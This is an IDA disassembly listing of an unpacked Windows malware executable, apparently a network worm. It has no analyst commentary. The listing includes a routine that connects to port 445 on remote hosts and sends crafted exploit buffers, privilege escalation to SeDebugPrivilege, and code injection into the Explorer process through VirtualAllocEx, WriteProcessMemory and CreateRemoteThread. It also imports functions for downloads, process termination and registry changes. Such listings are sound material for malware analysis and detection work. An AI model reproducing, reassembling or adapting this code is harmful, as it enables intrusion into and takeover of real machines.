;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8AC4992704648ABBD71674792FC31770
; File Name : u:\work\8ac4992704648abbd71674792fc31770_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31002264+1D�r
dword_31001010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31002264+4E�r ...
dword_31001018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_310026A6+37�r
dword_3100105C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_310026A6+3D�r
dword_31001060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31002542+8F�r
dword_3100107C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31001262+272�r ...
dword_31001080 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31001ADF+E2�r ...
dword_31001084 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31001851+2C�r
dword_31001090 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31001E06+A4�r
dword_31001094 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_310019B3+19�r ...
dword_3100109C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31002310+92�r
dword_310010A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31001D8A�r
dword_310010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_310019B3+12�r
dword_310010B0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31001C18+66�r ...
dword_310010C0 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_310010C4 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_310010C8 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_310026A6+8F�r
dword_310010CC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31002476+C3�r
dword_310010D0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_310010D4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31002476+F�r
dword_310010D8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_310010DC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_310010E0 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3100202D+58�r
align 8
dword_310010E8 dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_310010EC dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31002928+68�r
; ---------------------------------------------------------------------------
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_310010F4 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31002310+79�r ...
dword_310010F8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31001AC9+1�r ...
dword_310010FC dd 77C371BCh ; resolved to->MSVCRT.sranddword_31001100 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31001104 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31001108 dd 77C475F0h ; resolved to->MSVCRT.memset align 10h
dword_31001110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31001114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31001118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3100111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31001ADF+8B�r ...
dd 0
dword_31001124 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31002A44+B3�r
dword_31001128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31002A44+9E�r
dword_3100112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31002A44+89�r
dword_31001130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31001134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31001140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31001144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31001148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3100114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31001150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31001154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31001158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31001C18+AC�r
dword_3100115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_310020F4+D�r
dword_31001160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31001C18+F0�r
dword_31001164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31001168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31001ADF+67�r ...
dword_3100116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31001262+1D8�r ...
dword_31001170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31001ADF+11B�r
dword_31001174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31001ADF+122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_31001190 proc near ; CODE XREF: sub_31002928+BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 1
pop eax
jmp short loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD: ; CODE XREF: sub_31001190+19�j
; sub_31001190+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190+2B�j
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
; =============== S U B R O U T I N E =======================================
sub_310011DF proc near ; CODE XREF: sub_31002928+10F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310011FB proc near ; CODE XREF: sub_31002928+EA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3100101C ; CryptCreateHash
test eax, eax
jnz short loc_31001221
push 1
pop eax
jmp short loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221: ; CODE XREF: sub_310011FB+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001020 ; CryptHashData
test eax, eax
jnz short loc_3100123A
push 2
pop edi
jmp short loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A: ; CODE XREF: sub_310011FB+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31001024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_31001253: ; CODE XREF: sub_310011FB+3D�j
push [ebp+arg_0]
call dword_31001028 ; CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB+24�j
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001262 proc near ; CODE XREF: sub_31001F41+36�p
; sub_31001FA5+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31001158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_310017C2
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3100115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_31001084 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_310049C0
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_310012D5: ; CODE XREF: sub_31001262+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310012D5
push 60h
lea eax, [ebp+var_E4]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31002B98 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31002B8C ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31001160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31001164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp eax, 46h
jl loc_310017AD
cmp [ebp+var_730], 31h
jnz loc_31001658
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31002B8C ; memset
add esp, 0Ch
push offset byte_31004000
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp, 0Ch
mov [ebp+var_798], eax
loc_310014F9: ; CODE XREF: sub_31001262+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp [ebp+arg_0], 0
jz loc_31001748
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658: ; CODE XREF: sub_31001262+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31002B8C ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp, 40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_310016F4: ; CODE XREF: sub_31001262+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_310016F4
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31002B8C ; memset
add esp, 18h
jmp loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748: ; CODE XREF: sub_31001262+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_310017AD: ; CODE XREF: sub_31001262+1AD�j
; sub_31001262+1E1�j ...
push 2
push [ebp+var_4]
call dword_31001170 ; shutdown
loc_310017B8: ; CODE XREF: sub_31001262+166�j
push [ebp+var_4]
call dword_31001174 ; closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31001262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_31001090 ; LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_3100184D
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_3100184D
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_3100184D
lea eax, [ebp+var_C]
push eax
push 20h
call dword_31001088 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9+28�j
; sub_310017C9+37�j ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31004FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_310010A0 ; GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31001898
loc_31001894: ; CODE XREF: sub_31001851+54�j
push 1
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898: ; CODE XREF: sub_31001851+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31001894
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31001110 ; FindWindowA
test eax, eax
jnz short loc_310018C6
call dword_31001114 ; GetForegroundWindow
test eax, eax
jnz short loc_310018C6
push 2
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6: ; CODE XREF: sub_31001851+65�j
; sub_31001851+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31001118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_3100109C ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851+45�j
; sub_31001851+73�j
pop eax
jmp short loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC: ; CODE XREF: sub_31001851+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31001098
test eax, eax
jz short loc_3100194A
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ; WriteProcessMemory
push dword_31004FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31001936
push eax
call esi ; CloseHandle
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_31001936: ; CODE XREF: sub_31001851+DE�j
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov [ebp+var_4], 5
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A: ; CODE XREF: sub_31001851+B2�j
mov [ebp+var_4], 4
loc_31001951: ; CODE XREF: sub_31001851+E3�j
; sub_31001851+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31001957: ; CODE XREF: sub_31001851+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100195C proc near ; CODE XREF: sub_31001C18+B�p
; UPX0:31001DA0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_310010A4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_310010FC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
; =============== S U B R O U T I N E =======================================
sub_3100198A proc near ; CODE XREF: sub_31001851+EA�p
; UPX0:31001DAA�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_310010A8 ; CreateMutexA
retn
sub_3100198A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001999 proc near ; CODE XREF: sub_31001E06+E3�p
; sub_31001E06+EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
pop ebp
retn
sub_31001999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310019B3 proc near ; CODE XREF: sub_31001C18+12C�p
; sub_31001FA5+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
push eax
call dword_31001098 ; CloseHandle
pop ebp
retn
sub_310019B3 endp
; =============== S U B R O U T I N E =======================================
sub_310019D4 proc near ; CODE XREF: sub_31002476+3B�p
; sub_31002542+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4+26�j
call dword_310010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A04 proc near ; CODE XREF: sub_310026A6+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_310010B0 ; CreateProcessA
push [ebp+var_C]
